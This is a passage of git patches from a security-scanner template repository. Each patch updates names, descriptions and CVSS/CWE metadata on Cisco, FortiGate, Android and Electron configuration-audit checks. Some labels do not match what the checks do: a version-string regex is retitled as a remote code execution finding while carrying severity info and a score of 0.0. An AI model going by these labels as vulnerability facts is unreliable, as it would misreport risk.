diff --git a/file/audit/cisco/configure-aaa-service.yaml b/file/audit/cisco/configure-aaa-service.yaml index 70d249dfef..5850c83e3f 100644 --- a/file/audit/cisco/configure-aaa-service.yaml +++ b/file/audit/cisco/configure-aaa-service.yaml @@ -1,13 +1,17 @@ id: configure-aaa-service info: - name: Configure AAA service + name: Cisco AAA Service Configuration - Detect author: pussycat0x severity: info description: | - Authentication, authorization and accounting (AAA) services provide an authoritative source for managing and monitoring access for devices. + Cisco authentication, authorization and accounting service configuration was detected. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router file: @@ -24,3 +28,5 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/02 From 105af9d22eba6d0033c82abe4ee45f90e3d4657e Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 14:06:18 -0400 Subject: [PATCH 086/609] Enhancement: file/audit/cisco/configure-service-timestamps-debug.yaml by md --- .../cisco/configure-service-timestamps-debug.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/cisco/configure-service-timestamps-debug.yaml b/file/audit/cisco/configure-service-timestamps-debug.yaml index 4980d09b8c..102604dd43 100644 --- a/file/audit/cisco/configure-service-timestamps-debug.yaml +++ b/file/audit/cisco/configure-service-timestamps-debug.yaml @@ -1,13 +1,17 @@ id: configure-service-timestamps-debug info: - name: Configure Service Timestamps for Debug + name: Cisco Configure Service Timestamps for Debug - Detect author: pussycat0x severity: info description: | - To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service. + Cisco service timestamp configuration for debug process was detected. reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router file: @@ -24,3 +28,5 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/02 From 00c8b79986f3b18dfe9a35762c91f6a93e8f82d5 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 14:06:39 -0400 Subject: [PATCH 087/609] Enhancement: file/audit/cisco/configure-service-timestamps-logmessages.yaml by md --- .../audit/cisco/configure-service-timestamps-logmessages.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/file/audit/cisco/configure-service-timestamps-logmessages.yaml b/file/audit/cisco/configure-service-timestamps-logmessages.yaml index 7a2bc90538..312d494722 100644 --- a/file/audit/cisco/configure-service-timestamps-logmessages.yaml +++ b/file/audit/cisco/configure-service-timestamps-logmessages.yaml @@ -1,7 +1,7 @@ id: configure-service-log-messages info: - name: Configure Service Timestamps Log Messages + name: Cisco Configure Service Timestamps Log Messages author: pussycat0x severity: info description: | @@ -24,3 +24,5 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/02 From 52a23e7fccc130a88273d60aaab4a3cf4faec10a Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 14:08:39 -0400 Subject: [PATCH 088/609] Enhancement: file/audit/cisco/configure-service-timestamps-logmessages.yaml by md --- .../cisco/configure-service-timestamps-logmessages.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/file/audit/cisco/configure-service-timestamps-logmessages.yaml b/file/audit/cisco/configure-service-timestamps-logmessages.yaml index 312d494722..d1447b852c 100644 --- a/file/audit/cisco/configure-service-timestamps-logmessages.yaml +++ b/file/audit/cisco/configure-service-timestamps-logmessages.yaml @@ -1,13 +1,17 @@ id: configure-service-log-messages info: - name: Cisco Configure Service Timestamps Log Messages + name: Cisco Configure Service Timestamps Log Messages - Detect author: pussycat0x severity: info description: | - To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service. + Cisco service timestamp configuration for log messages was detected. reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router file: From d84a48f2a6c3952ce40dae75f78ebb38ab09f731 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 16:49:59 -0400 Subject: [PATCH 089/609] Enhancement: file/android/debug-enabled.yaml by md --- file/android/debug-enabled.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/file/android/debug-enabled.yaml b/file/android/debug-enabled.yaml index f2a2340fe4..b4435a9f2d 100644 --- a/file/android/debug-enabled.yaml +++ b/file/android/debug-enabled.yaml @@ -1,7 +1,7 @@ id: android-debug-enabled info: - name: Android Debug Enabling - Detect + name: Android Debug - Detect author: gaurang severity: low description: Android debug enabling was detected. @@ -15,4 +15,4 @@ file: regex: - "android:debuggable=\"true\"" -# Enhanced by md on 2023/05/02 +# Enhanced by md on 2023/05/03 From d9e474fe430dfe4d7044194d0017054f295a1b30 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 16:50:16 -0400 Subject: [PATCH 090/609] Enhancement: file/android/content-scheme.yaml by md --- file/android/content-scheme.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/file/android/content-scheme.yaml b/file/android/content-scheme.yaml index d153174f81..d0b6474b7c 100644 --- a/file/android/content-scheme.yaml +++ b/file/android/content-scheme.yaml @@ -1,7 +1,7 @@ id: content-scheme info: - name: Android Content Scheme Enabling - Detect + name: Android Content Scheme - Detect author: gaurang severity: info description: Android content scheme enabling was detected. @@ -20,4 +20,4 @@ file: words: - "android:scheme=\"content\"" -# Enhanced by md on 2023/05/02 +# Enhanced by md on 2023/05/03 From 4ba6bf83d490c87be7d5052dfe6868adddb2e1e3 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 16:50:28 -0400 Subject: [PATCH 091/609] Enhancement: file/android/file-scheme.yaml by md --- file/android/file-scheme.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/file/android/file-scheme.yaml b/file/android/file-scheme.yaml index 431810e444..4b38643bf9 100644 --- a/file/android/file-scheme.yaml +++ b/file/android/file-scheme.yaml @@ -1,7 +1,7 @@ id: file-scheme info: - name: Android File Scheme Enabling - Detect + name: Android File Scheme - Detect author: gaurang severity: info description: Android file scheme enabling was detected. @@ -20,4 +20,4 @@ file: words: - "android:scheme=\"file\"" -# Enhanced by md on 2023/05/02 +# Enhanced by md on 2023/05/03 From 991278886d051051d786d43e642aa5604106324d Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 16:50:37 -0400 Subject: [PATCH 092/609] Enhancement: file/android/webview-javascript.yaml by md --- file/android/webview-javascript.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/file/android/webview-javascript.yaml b/file/android/webview-javascript.yaml index fee5047e9e..2dd34a934e 100644 --- a/file/android/webview-javascript.yaml +++ b/file/android/webview-javascript.yaml @@ -1,7 +1,7 @@ id: webview-javascript-enabled info: - name: WebView JavaScript Enable - Detect + name: WebView JavaScript - Detect author: gaurang severity: info description: WebView Javascript enabling was detected. @@ -20,4 +20,4 @@ file: words: - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" -# Enhanced by md on 2023/05/02 +# Enhanced by md on 2023/05/03 From 6dd346d6a89d4a4d44ee4a77bf9dbc924c26f983 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 16:50:59 -0400 Subject: [PATCH 093/609] Enhancement: file/android/webview-universal-access.yaml by md --- file/android/webview-universal-access.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/file/android/webview-universal-access.yaml b/file/android/webview-universal-access.yaml index 63d3d3dd76..025b36e33e 100644 --- a/file/android/webview-universal-access.yaml +++ b/file/android/webview-universal-access.yaml @@ -1,7 +1,7 @@ id: webview-universal-access info: - name: Android WebView Universal Access Enable - Detect + name: Android WebView Universal Access - Detect author: gaurang severity: medium description: Android WebView Universal Access enabling was detected. @@ -20,4 +20,4 @@ file: words: - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" -# Enhanced by md on 2023/05/02 +# Enhanced by md on 2023/05/03 From c476f74eea4e99493373c8567dc51984f6709c07 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 17:07:32 -0400 Subject: [PATCH 094/609] Enhancement: file/electron/electron-version-detect.yaml by md --- file/electron/electron-version-detect.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/file/electron/electron-version-detect.yaml b/file/electron/electron-version-detect.yaml index 228af1cb3d..00433e4f47 100644 --- a/file/electron/electron-version-detect.yaml +++ b/file/electron/electron-version-detect.yaml @@ -1,9 +1,11 @@ id: electron-version-detect info: - name: Electron Version Detect + name: Google Chromium/Electron - Remote Code Execution author: me9187 severity: info + description: Google Chromium contains a remote code execution vulnerability which affects all recent versions of Electron. Any Electron app that accesses remote content is vulnerable to this exploit, regardless of whether the sandbox option is enabled. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: Update to Electron 1.7.8 or 1.6.14, both of which include a fix for this vulnerability. reference: - https://www.electronjs.org/blog/chromium-rce-vulnerability/ tags: electron,file @@ -16,3 +18,5 @@ file: - type: regex regex: - '"electronVersion":"[^"]*"' + +# Enhanced by md on 2023/05/03 From e873d69b9c2aa6ff2d1378d0d716545287e235aa Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 17:07:57 -0400 Subject: [PATCH 095/609] Enhancement: file/electron/electron-version-detect.yaml by md --- file/electron/electron-version-detect.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/file/electron/electron-version-detect.yaml b/file/electron/electron-version-detect.yaml index 00433e4f47..705e2b1b5c 100644 --- a/file/electron/electron-version-detect.yaml +++ b/file/electron/electron-version-detect.yaml @@ -8,6 +8,10 @@ info: remediation: Update to Electron 1.7.8 or 1.6.14, both of which include a fix for this vulnerability. reference: - https://www.electronjs.org/blog/chromium-rce-vulnerability/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: electron,file file: From f73e0990818170ec900c9e965fa1873d9a1b0d73 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 17:18:08 -0400 Subject: [PATCH 096/609] Enhancement: file/audit/fortigate/auto-usb-install.yaml by md --- file/audit/fortigate/auto-usb-install.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/fortigate/auto-usb-install.yaml b/file/audit/fortigate/auto-usb-install.yaml index b5394056d7..4f29327cad 100644 --- a/file/audit/fortigate/auto-usb-install.yaml +++ b/file/audit/fortigate/auto-usb-install.yaml @@ -1,11 +1,15 @@ id: auto-usb-install info: - name: Auto USB Installation Enabled + name: Fortinet Auto USB Installation - Detect author: pussycat0x severity: info - description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port. + description: Via Fortinet Auto USB installation, an attacker with physical access to a FortiGate can load a new configuration or firmware using the USB port, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate file: @@ -26,3 +30,5 @@ file: - "config router" - "config firewall" condition: or + +# Enhanced by md on 2023/05/03 From 32ec5f3f6b2a4a8613ab39c6514d44e28508541e Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 17:35:50 -0400 Subject: [PATCH 097/609] Enhancement: file/audit/cisco/disable-ip-source-route.yaml by md --- file/audit/cisco/disable-ip-source-route.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/audit/cisco/disable-ip-source-route.yaml b/file/audit/cisco/disable-ip-source-route.yaml index c1c2077708..3fe98d5ed6 100644 --- a/file/audit/cisco/disable-ip-source-route.yaml +++ b/file/audit/cisco/disable-ip-source-route.yaml @@ -1,13 +1,18 @@ id: disable-ip-source-route info: - name: Disable IP source-route + name: Cisco IP Source-Route - Detect author: pussycat0x severity: info description: | - Organizations should plan and implement network policies to ensure unnecessary services are explicitly disabled. The 'ip source-route' feature has been used in several attacks and should be disabled. + Cisco IP source-route functionality has been utilized in several attacks. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Disable IP source-route where appropriate. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router file: @@ -24,3 +29,5 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/03 From 0acbfcd28e103dbe1c16535e5f3fa3b5306482b7 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 17:38:48 -0400 Subject: [PATCH 098/609] Enhancement: file/audit/cisco/disable-pad-service.yaml by md --- file/audit/cisco/disable-pad-service.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/cisco/disable-pad-service.yaml b/file/audit/cisco/disable-pad-service.yaml index 80df2f9b7f..75b9a336eb 100644 --- a/file/audit/cisco/disable-pad-service.yaml +++ b/file/audit/cisco/disable-pad-service.yaml @@ -1,13 +1,17 @@ id: disable-pad-service info: - name: Disable PAD service + name: Cisco PAD - Detect author: pussycat0x severity: info description: | - To reduce the risk of unauthorized access, organizations should implement a security policy restricting unnecessary services such as the 'PAD' service. + Cisco PAD service has proven vulnerable to attackers. To reduce the risk of unauthorized access, organizations should implement a security policy restricting or disabling unnecessary access. reference: - http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file,router file: @@ -24,3 +28,5 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/03 From 1e7d66b4132724aac805487966bd32f7d7119091 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 17:47:46 -0400 Subject: [PATCH 099/609] Enhancement: file/audit/cisco/logging-enable.yaml by md --- file/audit/cisco/logging-enable.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/cisco/logging-enable.yaml b/file/audit/cisco/logging-enable.yaml index 10b20ed2e4..f12c2a4772 100644 --- a/file/audit/cisco/logging-enable.yaml +++ b/file/audit/cisco/logging-enable.yaml @@ -1,13 +1,17 @@ id: logging-enable info: - name: Logging enable + name: Cisco Logging Time Stamp Enable - Detect author: pussycat0x severity: info description: | - Enabling the Cisco IOS 'logging enable' command enforces the monitoring of technology risks for the organizations' network devices. + Cisco logging time stamp enable command enforces the monitoring of technology risks for organizations' network devices. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file file: @@ -24,3 +28,5 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/03 From 71e596f7eed5e153a61ae51b43abd7ff7c76e2a1 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 18:00:08 -0400 Subject: [PATCH 100/609] Enhancement: file/audit/cisco/set-and-secure-passwords.yaml by md --- file/audit/cisco/set-and-secure-passwords.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/cisco/set-and-secure-passwords.yaml b/file/audit/cisco/set-and-secure-passwords.yaml index 703d29b8d3..438aa9ade7 100644 --- a/file/audit/cisco/set-and-secure-passwords.yaml +++ b/file/audit/cisco/set-and-secure-passwords.yaml @@ -1,13 +1,17 @@ id: set-and-secure-passwords info: - name: Set and secure passwords + name: Cisco Set and Secure Password - Detect author: pussycat0x severity: info description: | - To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command. + Cisco set and secure password functionality is recommended to control privilege level access. To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-e1.html#wp3884449514 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: cisco,config-audit,cisco-switch,file file: @@ -24,3 +28,5 @@ file: - type: word words: - "configure terminal" + +# Enhanced by md on 2023/05/03 From 236d6f991f83c03bee4569d206b2ea759d0610b5 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 18:11:51 -0400 Subject: [PATCH 101/609] Enhancement: file/audit/fortigate/heuristic-scan.yaml by md --- file/audit/fortigate/heuristic-scan.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/fortigate/heuristic-scan.yaml b/file/audit/fortigate/heuristic-scan.yaml index 801b499ada..16fb20ce24 100644 --- a/file/audit/fortigate/heuristic-scan.yaml +++ b/file/audit/fortigate/heuristic-scan.yaml @@ -1,11 +1,15 @@ id: heuristic-scan info: - name: Heuristic scanning is not configured + name: Fortinet Heuristic Scanning - Configuration author: pussycat0x severity: info - description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled. + description: Fortinet heuristic scanning is advised to thwart attacks. Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message is forwarded to the recipient, and blocked files are quarantined if quarantine is enabled. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate file: @@ -26,3 +30,5 @@ file: - "config router" - "config firewall" condition: or + +# Enhanced by md on 2023/05/03 From 68a3c7c84b7a7a4878986caf18379692a23ba7b4 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 18:14:10 -0400 Subject: [PATCH 102/609] Enhancement: file/audit/fortigate/heuristic-scan.yaml by md --- file/audit/fortigate/heuristic-scan.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/audit/fortigate/heuristic-scan.yaml b/file/audit/fortigate/heuristic-scan.yaml index 16fb20ce24..1dd2784e11 100644 --- a/file/audit/fortigate/heuristic-scan.yaml +++ b/file/audit/fortigate/heuristic-scan.yaml @@ -4,7 +4,7 @@ info: name: Fortinet Heuristic Scanning - Configuration author: pussycat0x severity: info - description: Fortinet heuristic scanning is advised to thwart attacks. Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message is forwarded to the recipient, and blocked files are quarantined if quarantine is enabled. + description: Fortinet heuristic scanning configuration is advised to thwart attacks. Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message is forwarded to the recipient, and blocked files are quarantined if quarantine is enabled. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N From 4877035adbb2c7d10fc93365922ca3fee65606f9 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 18:20:06 -0400 Subject: [PATCH 103/609] Enhancement: file/audit/fortigate/inactivity-timeout.yaml by md --- file/audit/fortigate/inactivity-timeout.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/fortigate/inactivity-timeout.yaml b/file/audit/fortigate/inactivity-timeout.yaml index f73b9e5ffb..7bc9344045 100644 --- a/file/audit/fortigate/inactivity-timeout.yaml +++ b/file/audit/fortigate/inactivity-timeout.yaml @@ -1,11 +1,15 @@ id: inactivity-timeout info: - name: Inactivity Timeout Not Implemented + name: Fortinet Inactivity Timeout - Detect author: pussycat0x severity: info - description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer. + description: If Fortinet inactivity timeout functionality is disabled, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations within that window if the administrator is away from the computer. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate file: @@ -25,3 +29,5 @@ file: - "config router" - "config firewall" condition: or + +# Enhanced by md on 2023/05/03 From b8bffb125155a41757fad97e0077f36e470bd408 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 18:21:34 -0400 Subject: [PATCH 104/609] Enhancement: file/audit/fortigate/maintainer-account.yaml by md --- file/audit/fortigate/maintainer-account.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/fortigate/maintainer-account.yaml b/file/audit/fortigate/maintainer-account.yaml index afad089999..8c90e09c84 100644 --- a/file/audit/fortigate/maintainer-account.yaml +++ b/file/audit/fortigate/maintainer-account.yaml @@ -1,11 +1,15 @@ id: maintainer-account info: - name: Maintainer Account Not Implemented + name: Fortinet Maintainer Account - Detect author: pussycat0x severity: info - description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI.. + description: In Fortinet, if a FortiGate is compromised and the password is not recoverable, a maintainer account can be used by an administrator with physical access to log into CLI. reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate file: @@ -25,3 +29,5 @@ file: - "config router" - "config firewall" condition: or + +# Enhanced by md on 2023/05/03 From 49774f45fbd96980d1f6455f6ec227d2210c062f Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 3 May 2023 18:23:47 -0400 Subject: [PATCH 105/609] Enhancement: file/audit/fortigate/password-policy.yaml by md --- file/audit/fortigate/password-policy.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/fortigate/password-policy.yaml b/file/audit/fortigate/password-policy.yaml index b66aa24bc0..d49f8f0ed1 100644 --- a/file/audit/fortigate/password-policy.yaml +++ b/file/audit/fortigate/password-policy.yaml @@ -1,11 +1,15 @@ id: password-policy info: - name: Password Policy not Set + name: Fortinet Password Policy - Detect author: pussycat0x severity: info - description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements. + description: Fortinet administrative password policy is not set. Using this feature is recommended to ensure all administrators use secure passwords that meet organizations' requirements. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: fortigate,config,audit,file,firewall file: @@ -25,3 +29,5 @@ file: - "config router" - "config firewall" condition: or + +# Enhanced by md on 2023/05/03 From 0c265debeb12566addf27543de341321344551b1 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 10:50:26 -0400 Subject: [PATCH 106/609] Enhancement: file/audit/fortigate/remote-auth-timeout.yaml by md --- file/audit/fortigate/remote-auth-timeout.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/file/audit/fortigate/remote-auth-timeout.yaml b/file/audit/fortigate/remote-auth-timeout.yaml index fdf19cbb5f..27396f4c11 100644 --- a/file/audit/fortigate/remote-auth-timeout.yaml +++ b/file/audit/fortigate/remote-auth-timeout.yaml @@ -1,11 +1,16 @@ id: remote-auth-timeout info: - name: Remote Authentication timeout not set + name: Fortinet Remote Authentication Timeout - Detect author: pussycat0x severity: info - description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer. - reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate + description: Fortinet remote authentication timeout functionality is recommended to be enabled. Lack of a set timeout can allow an attacker to act within that threshold if the administrator is away from the computer, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate file: @@ -25,3 +30,5 @@ file: - "config router" - "config firewall" condition: or + +# Enhanced by md on 2023/05/04 From fe5a35cc829328f37ebd21a77e301adc4d8dab03 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 4 May 2023 10:53:29 -0400 Subject: [PATCH 107/609] Enhancement: file/audit/fortigate/scp-admin.yaml by md --- file/audit/fortigate/scp-admin.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/file/audit/fortigate/scp-admin.yaml b/file/audit/fortigate/scp-admin.yaml index edec95f93c..32f00ee762 100644 --- a/file/audit/fortigate/scp-admin.yaml +++ b/file/audit/fortigate/scp-admin.yaml @@ -1,11 +1,15 @@ id: scp-admin info: - name: Admin-SCP Disabled + name: Fortinet Admin-SCP - Detect author: pussycat0x severity: info - description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file. + description: Fortinet Admin-SCP functionality is recommended to be disabled by default. Enabling SCP allows download of the configuration file from the FortiGate as an alternative method of backing up the configuration file. reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: audit,config,file,firewall,fortigate file: @@ -25,3 +29,5 @@ file: - "config router" - "config firewall" condition: or + +# Enhanced by md on 2023/05/04 From d53afe469b3eb824d4270638f3d43dcd280685f5 Mon Sep 17 00:00:00 2001 From: 